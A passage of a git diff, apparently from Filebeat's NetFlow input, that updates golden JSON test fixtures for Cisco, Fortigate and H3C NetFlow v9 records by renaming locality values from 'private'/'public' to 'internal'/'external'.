"Ddy-Ii-ZDDI", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAAoQ==", @@ -1379,7 +1379,7 @@ "source": { "bytes": 116, "ip": "10.11.21.60", - "locality": "private", + "locality": "internal", "packets": 1, "port": 161 } @@ -1393,7 +1393,7 @@ "Fields": { "destination": { "ip": "10.14.121.98", - "locality": "private", + "locality": "internal", "port": 50174 }, "event": { @@ -1409,7 +1409,7 @@ }, "flow": { "id": "gJ7Z20zGGk8", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQAB2Q==", @@ -1456,7 +1456,7 @@ "source": { "bytes": 22764, "ip": "10.12.100.13", - "locality": "private", + "locality": "internal", "packets": 30, "port": 389 } @@ -1470,7 +1470,7 @@ "Fields": { "destination": { "ip": "10.10.11.21", - "locality": "private", + "locality": "internal", "port": 61443 }, "event": { @@ -1486,7 +1486,7 @@ }, "flow": { "id": "LZaFrMI9jg0", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQAAQA==", @@ -1533,7 +1533,7 @@ "source": { "bytes": 80, "ip": "10.12.102.125", - "locality": "private", + "locality": "internal", "packets": 2, "port": 1720 } @@ -1547,7 +1547,7 @@ "Fields": { "destination": { "ip": "10.11.21.60", - "locality": "private", + "locality": "internal", "port": 161 }, "event": { @@ -1563,7 +1563,7 @@ }, "flow": { "id": "f6pXcQQIzpU", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAAoQ==", @@ -1610,7 +1610,7 @@ "source": { "bytes": 75, "ip": "10.100.105.86", - "locality": "private", + "locality": "internal", "packets": 1, "port": 58844 } @@ -1624,7 +1624,7 @@ "Fields": { "destination": { "ip": "10.12.102.125", - "locality": "private", + "locality": "internal", "port": 1720 }, "event": { @@ -1640,7 +1640,7 @@ }, "flow": { "id": "LZaFrMI9jg0", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQAAQA==", @@ -1687,7 +1687,7 @@ "source": { "bytes": 80, "ip": "10.10.11.21", - "locality": "private", + "locality": "internal", "packets": 2, "port": 61443 } @@ -1701,7 +1701,7 @@ "Fields": { "destination": { "ip": "10.10.4.151", - "locality": "private", + "locality": "internal", "port": 161 }, "event": { @@ -1717,7 +1717,7 @@ }, "flow": { "id": "gQGJtHjUcB8", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAAoQ==", @@ -1764,7 +1764,7 @@ "source": { "bytes": 160, "ip": "10.100.105.85", - "locality": "private", + "locality": "internal", "packets": 2, "port": 37265 } @@ -1778,7 +1778,7 @@ "Fields": { "destination": { "ip": "17.253.24.253", - "locality": "public", + "locality": "external", "port": 123 }, "event": { @@ -1794,7 +1794,7 @@ }, "flow": { "id": "UHiF_w4I6zM", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "AwAAew==", @@ -1841,7 +1841,7 @@ "source": { "bytes": 76, "ip": "10.14.25.80", - "locality": "private", + "locality": "internal", "packets": 1, "port": 62427 } @@ -1855,7 +1855,7 @@ "Fields": { "destination": { "ip": "10.100.101.43", - "locality": "private", + "locality": "internal", "port": 49156 }, "event": { @@ -1871,7 +1871,7 @@ }, "flow": { "id": "czsFrOKrayM", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQAB2Q==", @@ -1918,7 +1918,7 @@ "source": { "bytes": 1340, "ip": "10.12.150.13", - "locality": "private", + "locality": "internal", "packets": 2, "port": 61792 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-NBAR-flowset-262.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-NBAR-flowset-262.golden.json index 48dc5ef1c839..b5724dfc3424 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-NBAR-flowset-262.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-NBAR-flowset-262.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "10.30.19.180", - "locality": "private", + "locality": "internal", "mac": "1c:df:0f:7e:c3:58", "port": 2048 }, @@ -27,7 +27,7 @@ }, "flow": { "id": "Bk-2FcuOyCU", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AQAAAQ==", @@ -84,7 +84,7 @@ "source": { "bytes": 44, "ip": "10.30.18.62", - "locality": "private", + "locality": "internal", "mac": "00:50:56:91:56:86", "packets": 1, "port": 0 @@ -99,7 +99,7 @@ "Fields": { "destination": { "ip": "10.30.19.180", - "locality": "private", + "locality": "internal", "mac": "1c:df:0f:7e:c3:58", "port": 161 }, @@ -119,7 +119,7 @@ }, "flow": { "id": "4Xk8GtQfUAo", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "BQAAJg==", @@ -176,7 +176,7 @@ "source": { "bytes": 106, "ip": "10.30.18.62", - "locality": "private", + "locality": "internal", "mac": "00:50:56:91:56:86", "packets": 1, "port": 34220 @@ -191,7 +191,7 @@ "Fields": { "destination": { "ip": "10.30.19.180", - "locality": "private", + "locality": "internal", "mac": "1c:df:0f:7e:c3:58", "port": 2048 }, @@ -211,7 +211,7 @@ }, "flow": { "id": "tfLRXnB6AOA", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AQAAAQ==", @@ -268,7 +268,7 @@ "source": { "bytes": 44, "ip": "10.10.172.60", - "locality": "private", + "locality": "internal", "mac": "00:18:19:9e:6c:01", "packets": 1, "port": 0 @@ -283,7 +283,7 @@ "Fields": { "destination": { "ip": "10.30.19.180", - "locality": "private", + "locality": "internal", "mac": "1c:df:0f:7e:c3:58", "port": 123 }, @@ -303,7 +303,7 @@ }, "flow": { "id": "1mfP23NPuB8", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAAew==", @@ -360,7 +360,7 @@ "source": { "bytes": 76, "ip": "10.10.172.60", - "locality": "private", + "locality": "internal", "mac": "00:18:19:9e:6c:01", "packets": 1, "port": 123 @@ -375,7 +375,7 @@ "Fields": { "destination": { "ip": "10.30.19.180", - "locality": "private", + "locality": "internal", "mac": "1c:df:0f:7e:c3:58", "port": 161 }, @@ -395,7 +395,7 @@ }, "flow": { "id": "g6a7KlISbtM", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "BQAAJg==", @@ -452,7 +452,7 @@ "source": { "bytes": 2794, "ip": "10.10.172.60", - "locality": "private", + "locality": "internal", "mac": "00:18:19:9e:6c:01", "packets": 36, "port": 45269 diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-WLC.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-WLC.golden.json index b4f6a597dbe4..91b2caa73d28 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-WLC.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-WLC.golden.json @@ -21,7 +21,7 @@ }, "flow": { "id": "lTcFptYSabQ", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQAB3w==", @@ -56,7 +56,7 @@ "source": { "bytes": 3320, "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51", "packets": 83 } @@ -70,7 +70,7 @@ "Fields": { "destination": { "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51" }, "event": { @@ -86,7 +86,7 @@ }, "flow": { "id": "Q1JIGzkHw0I", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQAB3w==", @@ -147,7 +147,7 @@ }, "flow": { "id": "lTcFptYSabQ", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAANQ==", @@ -182,7 +182,7 @@ "source": { "bytes": 7760, "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51", "packets": 69 } @@ -196,7 +196,7 @@ "Fields": { "destination": { "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51" }, "event": { @@ -212,7 +212,7 @@ }, "flow": { "id": "Q1JIGzkHw0I", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAANQ==", @@ -273,7 +273,7 @@ }, "flow": { "id": "lTcFptYSabQ", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAAig==", @@ -308,7 +308,7 @@ "source": { "bytes": 215, "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51", "packets": 1 } @@ -336,7 +336,7 @@ }, "flow": { "id": "lTcFptYSabQ", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQAAAQ==", @@ -371,7 +371,7 @@ "source": { "bytes": 40854, "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51", "packets": 225 } @@ -385,7 +385,7 @@ "Fields": { "destination": { "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51" }, "event": { @@ -401,7 +401,7 @@ }, "flow": { "id": "Q1JIGzkHw0I", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQAAAQ==", @@ -462,7 +462,7 @@ }, "flow": { "id": "lTcFptYSabQ", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAAUA==", @@ -497,7 +497,7 @@ "source": { "bytes": 12279, "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51", "packets": 63 } @@ -511,7 +511,7 @@ "Fields": { "destination": { "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51" }, "event": { @@ -527,7 +527,7 @@ }, "flow": { "id": "Q1JIGzkHw0I", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwAAUA==", @@ -588,7 +588,7 @@ }, "flow": { "id": "lTcFptYSabQ", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQABxQ==", @@ -623,7 +623,7 @@ "source": { "bytes": 147145, "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51", "packets": 773 } @@ -637,7 +637,7 @@ "Fields": { "destination": { "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51" }, "event": { @@ -653,7 +653,7 @@ }, "flow": { "id": "Q1JIGzkHw0I", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQABxQ==", @@ -714,7 +714,7 @@ }, "flow": { "id": "lTcFptYSabQ", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQACCA==", @@ -749,7 +749,7 @@ "source": { "bytes": 6777, "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51", "packets": 26 } @@ -763,7 +763,7 @@ "Fields": { "destination": { "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51" }, "event": { @@ -779,7 +779,7 @@ }, "flow": { "id": "Q1JIGzkHw0I", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQACCA==", @@ -840,7 +840,7 @@ }, "flow": { "id": "lTcFptYSabQ", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwABuw==", @@ -875,7 +875,7 @@ "source": { "bytes": 2433001, "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51", "packets": 20434 } @@ -889,7 +889,7 @@ "Fields": { "destination": { "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51" }, "event": { @@ -905,7 +905,7 @@ }, "flow": { "id": "Q1JIGzkHw0I", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AwABuw==", @@ -966,7 +966,7 @@ }, "flow": { "id": "lTcFptYSabQ", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AQAAAQ==", @@ -1001,7 +1001,7 @@ "source": { "bytes": 1658, "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51", "packets": 15 } @@ -1015,7 +1015,7 @@ "Fields": { "destination": { "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51" }, "event": { @@ -1031,7 +1031,7 @@ }, "flow": { "id": "Q1JIGzkHw0I", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "AQAAAQ==", @@ -1092,7 +1092,7 @@ }, "flow": { "id": "lTcFptYSabQ", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQABrw==", @@ -1127,7 +1127,7 @@ "source": { "bytes": 1495567, "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51", "packets": 16145 } @@ -1141,7 +1141,7 @@ "Fields": { "destination": { "ip": "192.168.20.121", - "locality": "private", + "locality": "internal", "mac": "34:02:86:75:c0:51" }, "event": { @@ -1157,7 +1157,7 @@ }, "flow": { "id": "Q1JIGzkHw0I", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "DQABrw==", diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Fortigate-FortiOS-5.2.1.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Fortigate-FortiOS-5.2.1.golden.json index 1ae09a26b586..8dc5747704ac 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Fortigate-FortiOS-5.2.1.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Fortigate-FortiOS-5.2.1.golden.json @@ -48,7 +48,7 @@ "Fields": { "destination": { "ip": "31.13.87.36", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -64,7 +64,7 @@ }, "flow": { "id": "SKsZNpZob60", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "31.13.87.36", @@ -109,7 +109,7 @@ "source": { "bytes": 152, "ip": "192.168.99.7", - "locality": "private", + "locality": "internal", "packets": 3, "port": 61910 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Fortigate-FortiOS-54x-appid.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Fortigate-FortiOS-54x-appid.golden.json index bb8678bcad1d..dd90fa13b6d8 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Fortigate-FortiOS-54x-appid.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Fortigate-FortiOS-54x-appid.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "182.50.136.239", - "locality": "public", + "locality": "external", "port": 80 }, "event": { @@ -26,7 +26,7 @@ }, "flow": { "id": "FfT-8jRRvok", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "FAAAMEQAAI80", @@ -78,7 +78,7 @@ "source": { "bytes": 748, "ip": "192.168.100.151", - "locality": "private", + "locality": "internal", "packets": 6, "port": 45380 } @@ -92,7 +92,7 @@ "Fields": { "destination": { "ip": "192.168.100.151", - "locality": "private", + "locality": "internal", "port": 44778 }, "event": { @@ -111,7 +111,7 @@ }, "flow": { "id": "bZjTG4EkhLs", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "FAAAMEQAAJ54", @@ -163,7 +163,7 @@ "source": { "bytes": 6948, "ip": "208.100.17.187", - "locality": "public", + "locality": "external", "packets": 10, "port": 443 } @@ -177,7 +177,7 @@ "Fields": { "destination": { "ip": "208.100.17.187", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -196,7 +196,7 @@ }, "flow": { "id": "bZjTG4EkhLs", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "FAAAMEQAAJ54", @@ -248,7 +248,7 @@ "source": { "bytes": 1584, "ip": "192.168.100.151", - "locality": "private", + "locality": "internal", "packets": 14, "port": 44778 } @@ -262,7 +262,7 @@ "Fields": { "destination": { "ip": "192.168.100.151", - "locality": "private", + "locality": "internal", "port": 50618 }, "event": { @@ -281,7 +281,7 @@ }, "flow": { "id": "kZjCeMUhjqE", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "FAAAMEQAAJ54", @@ -333,7 +333,7 @@ "source": { "bytes": 8201, "ip": "208.100.17.189", - "locality": "public", + "locality": "external", "packets": 11, "port": 443 } @@ -347,7 +347,7 @@ "Fields": { "destination": { "ip": "208.100.17.189", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -366,7 +366,7 @@ }, "flow": { "id": "kZjCeMUhjqE", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "FAAAMEQAAJ54", @@ -418,7 +418,7 @@ "source": { "bytes": 1729, "ip": "192.168.100.151", - "locality": "private", + "locality": "internal", "packets": 15, "port": 50618 } @@ -432,7 +432,7 @@ "Fields": { "destination": { "ip": "192.168.100.151", - "locality": "private", + "locality": "internal", "port": 33660 }, "event": { @@ -451,7 +451,7 @@ }, "flow": { "id": "8PR91KFjFKw", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "FAAAMEQAAGTz", @@ -503,7 +503,7 @@ "source": { "bytes": 1122, "ip": "178.255.83.1", - "locality": "public", + "locality": "external", "packets": 5, "port": 80 } @@ -517,7 +517,7 @@ "Fields": { "destination": { "ip": "178.255.83.1", - "locality": "public", + "locality": "external", "port": 80 }, "event": { @@ -536,7 +536,7 @@ }, "flow": { "id": "8PR91KFjFKw", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "FAAAMEQAAGTz", @@ -588,7 +588,7 @@ "source": { "bytes": 705, "ip": "192.168.100.151", - "locality": "private", + "locality": "internal", "packets": 5, "port": 33660 } @@ -602,7 +602,7 @@ "Fields": { "destination": { "ip": "192.168.100.151", - "locality": "private", + "locality": "internal", "port": 33646 }, "event": { @@ -621,7 +621,7 @@ }, "flow": { "id": "O5vacJG8mLQ", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "FAAAMEQAAGTz", @@ -673,7 +673,7 @@ "source": { "bytes": 1123, "ip": "178.255.83.1", - "locality": "public", + "locality": "external", "packets": 5, "port": 80 } @@ -687,7 +687,7 @@ "Fields": { "destination": { "ip": "178.255.83.1", - "locality": "public", + "locality": "external", "port": 80 }, "event": { @@ -706,7 +706,7 @@ }, "flow": { "id": "O5vacJG8mLQ", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "FAAAMEQAAGTz", @@ -758,7 +758,7 @@ "source": { "bytes": 706, "ip": "192.168.100.151", - "locality": "private", + "locality": "internal", "packets": 5, "port": 33646 } @@ -772,7 +772,7 @@ "Fields": { "destination": { "ip": "192.168.100.150", - "locality": "private", + "locality": "internal", "port": 52970 }, "event": { @@ -791,7 +791,7 @@ }, "flow": { "id": "wdz94oax40U", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "FAAAMEQAAAAA", @@ -839,7 +839,7 @@ "source": { "bytes": 74, "ip": "192.168.100.111", - "locality": "private", + "locality": "internal", "packets": 1, "port": 53 } @@ -853,7 +853,7 @@ "Fields": { "destination": { "ip": "192.168.100.111", - "locality": "private", + "locality": "internal", "port": 53 }, "event": { @@ -872,7 +872,7 @@ }, "flow": { "id": "wdz94oax40U", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "FAAAMEQAAAAA", @@ -920,7 +920,7 @@ "source": { "bytes": 58, "ip": "192.168.100.150", - "locality": "private", + "locality": "internal", "packets": 1, "port": 52970 } @@ -934,7 +934,7 @@ "Fields": { "destination": { "ip": "192.168.100.150", - "locality": "private", + "locality": "internal", "port": 49311 }, "event": { @@ -953,7 +953,7 @@ }, "flow": { "id": "KvZZ7LW-Qdc", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "FAAAMEQAAAAA", @@ -1001,7 +1001,7 @@ "source": { "bytes": 74, "ip": "192.168.100.111", - "locality": "private", + "locality": "internal", "packets": 1, "port": 53 } @@ -1015,7 +1015,7 @@ "Fields": { "destination": { "ip": "192.168.100.111", - "locality": "private", + "locality": "internal", "port": 53 }, "event": { @@ -1034,7 +1034,7 @@ }, "flow": { "id": "KvZZ7LW-Qdc", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "FAAAMEQAAAAA", @@ -1082,7 +1082,7 @@ "source": { "bytes": 58, "ip": "192.168.100.150", - "locality": "private", + "locality": "internal", "packets": 1, "port": 49311 } @@ -1096,7 +1096,7 @@ "Fields": { "destination": { "ip": "192.168.100.150", - "locality": "private", + "locality": "internal", "port": 51746 }, "event": { @@ -1115,7 +1115,7 @@ }, "flow": { "id": "PC3a5T13Dpw", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "FAAAMEQAAAAA", @@ -1163,7 +1163,7 @@ "source": { "bytes": 1071, "ip": "192.168.100.111", - "locality": "private", + "locality": "internal", "packets": 5, "port": 80 } @@ -1177,7 +1177,7 @@ "Fields": { "destination": { "ip": "192.168.100.111", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -1196,7 +1196,7 @@ }, "flow": { "id": "PC3a5T13Dpw", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "FAAAMEQAAAAA", @@ -1244,7 +1244,7 @@ "source": { "bytes": 1147, "ip": "192.168.100.150", - "locality": "private", + "locality": "internal", "packets": 6, "port": 51746 } @@ -1258,7 +1258,7 @@ "Fields": { "destination": { "ip": "192.168.100.150", - "locality": "private", + "locality": "internal", "port": 51745 }, "event": { @@ -1277,7 +1277,7 @@ }, "flow": { "id": "zdGWMwGlfsg", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "FAAAMEQAAAAA", @@ -1325,7 +1325,7 @@ "source": { "bytes": 1980, "ip": "192.168.100.111", - "locality": "private", + "locality": "internal", "packets": 6, "port": 80 } @@ -1339,7 +1339,7 @@ "Fields": { "destination": { "ip": "192.168.100.111", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -1358,7 +1358,7 @@ }, "flow": { "id": "zdGWMwGlfsg", - "locality": "private" + "locality": "internal" }, "netflow": { "application_id": "FAAAMEQAAAAA", @@ -1406,7 +1406,7 @@ "source": { "bytes": 2164, "ip": "192.168.100.150", - "locality": "private", + "locality": "internal", "packets": 8, "port": 51745 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-H3C-Netstream-with-varstring.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-H3C-Netstream-with-varstring.golden.json index a63ef85e3c41..6a2049213916 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-H3C-Netstream-with-varstring.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-H3C-Netstream-with-varstring.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "20.20.255.255", - "locality": "public", + "locality": "external", "port": 137 }, "event": { @@ -26,7 +26,7 @@ }, "flow": { "id": "dK1E5m-O-ns", - "locality": "public" + "locality": "external" }, "netflow": { "bgp_destination_as_number": 0, @@ -84,7 +84,7 @@ "source": { "bytes": 702, "ip": "20.20.20.20", - "locality": "public", + "locality": "external", "packets": 9, "port": 137 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-H3C.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-H3C.golden.json index 9ee961bb97fb..a69dbeea3865 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-H3C.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-H3C.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "10.22.163.21", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -26,7 +26,7 @@ }, "flow": { "id": "6gDDasxO-4o", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -83,7 +83,7 @@ "source": { "bytes": 1027087, "ip": "10.22.166.30", - "locality": "private", + "locality": "internal", "packets": 697, "port": 0 } @@ -97,7 +97,7 @@ "Fields": { "destination": { "ip": "10.21.3.172", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -116,7 +116,7 @@ }, "flow": { "id": "RJbWY0zxttI", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -173,7 +173,7 @@ "source": { "bytes": 6200, "ip": "10.22.166.12", - "locality": "private", + "locality": "internal", "packets": 6, "port": 0 } @@ -187,7 +187,7 @@ "Fields": { "destination": { "ip": "10.22.178.37", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -206,7 +206,7 @@ }, "flow": { "id": "MfdYhUDA3Y4", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -263,7 +263,7 @@ "source": { "bytes": 11896, "ip": "10.22.166.33", - "locality": "private", + "locality": "internal", "packets": 21, "port": 0 } @@ -277,7 +277,7 @@ "Fields": { "destination": { "ip": "10.20.100.253", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -296,7 +296,7 @@ }, "flow": { "id": "_QFogYw9xiY", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -353,7 +353,7 @@ "source": { "bytes": 1041, "ip": "10.22.166.35", - "locality": "private", + "locality": "internal", "packets": 3, "port": 0 } @@ -367,7 +367,7 @@ "Fields": { "destination": { "ip": "10.20.136.36", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -386,7 +386,7 @@ }, "flow": { "id": "-O7eEnuq5LI", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -443,7 +443,7 @@ "source": { "bytes": 1740, "ip": "10.22.166.36", - "locality": "private", + "locality": "internal", "packets": 20, "port": 0 } @@ -457,7 +457,7 @@ "Fields": { "destination": { "ip": "10.20.147.28", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -476,7 +476,7 @@ }, "flow": { "id": "pcgnaJ3iCvI", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -533,7 +533,7 @@ "source": { "bytes": 2998, "ip": "10.22.166.36", - "locality": "private", + "locality": "internal", "packets": 16, "port": 0 } @@ -547,7 +547,7 @@ "Fields": { "destination": { "ip": "10.20.141.16", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -566,7 +566,7 @@ }, "flow": { "id": "_gbuwRW4AVE", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -623,7 +623,7 @@ "source": { "bytes": 55773, "ip": "10.22.166.28", - "locality": "private", + "locality": "internal", "packets": 37, "port": 0 } @@ -637,7 +637,7 @@ "Fields": { "destination": { "ip": "10.20.162.17", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -656,7 +656,7 @@ }, "flow": { "id": "VOe0rUor-cg", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -713,7 +713,7 @@ "source": { "bytes": 3239438, "ip": "10.22.166.35", - "locality": "private", + "locality": "internal", "packets": 2135, "port": 0 } @@ -727,7 +727,7 @@ "Fields": { "destination": { "ip": "10.20.171.36", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -746,7 +746,7 @@ }, "flow": { "id": "nkp7tr2MVcs", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -803,7 +803,7 @@ "source": { "bytes": 5701, "ip": "10.22.166.15", - "locality": "private", + "locality": "internal", "packets": 20, "port": 0 } @@ -817,7 +817,7 @@ "Fields": { "destination": { "ip": "10.22.208.12", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -836,7 +836,7 @@ }, "flow": { "id": "WxCFEmsTIh0", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -893,7 +893,7 @@ "source": { "bytes": 4255012, "ip": "10.22.166.2", - "locality": "private", + "locality": "internal", "packets": 2804, "port": 0 } @@ -907,7 +907,7 @@ "Fields": { "destination": { "ip": "10.22.196.21", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -926,7 +926,7 @@ }, "flow": { "id": "rAIv2psXy74", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -983,7 +983,7 @@ "source": { "bytes": 37557, "ip": "10.22.166.28", - "locality": "private", + "locality": "internal", "packets": 25, "port": 0 } @@ -997,7 +997,7 @@ "Fields": { "destination": { "ip": "10.22.202.15", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -1016,7 +1016,7 @@ }, "flow": { "id": "lR18K-eSVNM", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -1073,7 +1073,7 @@ "source": { "bytes": 23676, "ip": "10.22.166.25", - "locality": "private", + "locality": "internal", "packets": 68, "port": 0 } @@ -1087,7 +1087,7 @@ "Fields": { "destination": { "ip": "10.20.166.26", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -1106,7 +1106,7 @@ }, "flow": { "id": "1XCFo-Jv19g", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -1163,7 +1163,7 @@ "source": { "bytes": 22821, "ip": "10.22.166.25", - "locality": "private", + "locality": "internal", "packets": 30, "port": 0 } @@ -1177,7 +1177,7 @@ "Fields": { "destination": { "ip": "10.21.3.117", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -1196,7 +1196,7 @@ }, "flow": { "id": "DkV-9Meb8W8", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -1253,7 +1253,7 @@ "source": { "bytes": 526, "ip": "10.22.166.12", - "locality": "private", + "locality": "internal", "packets": 2, "port": 0 } @@ -1267,7 +1267,7 @@ "Fields": { "destination": { "ip": "10.22.145.26", - "locality": "private", + "locality": "internal", "port": 0 }, "event": { @@ -1286,7 +1286,7 @@ }, "flow": { "id": "v1m_MeAqdL4", - "locality": "private" + "locality": "internal" }, "netflow": { "bgp_destination_as_number": 0, @@ -1343,7 +1343,7 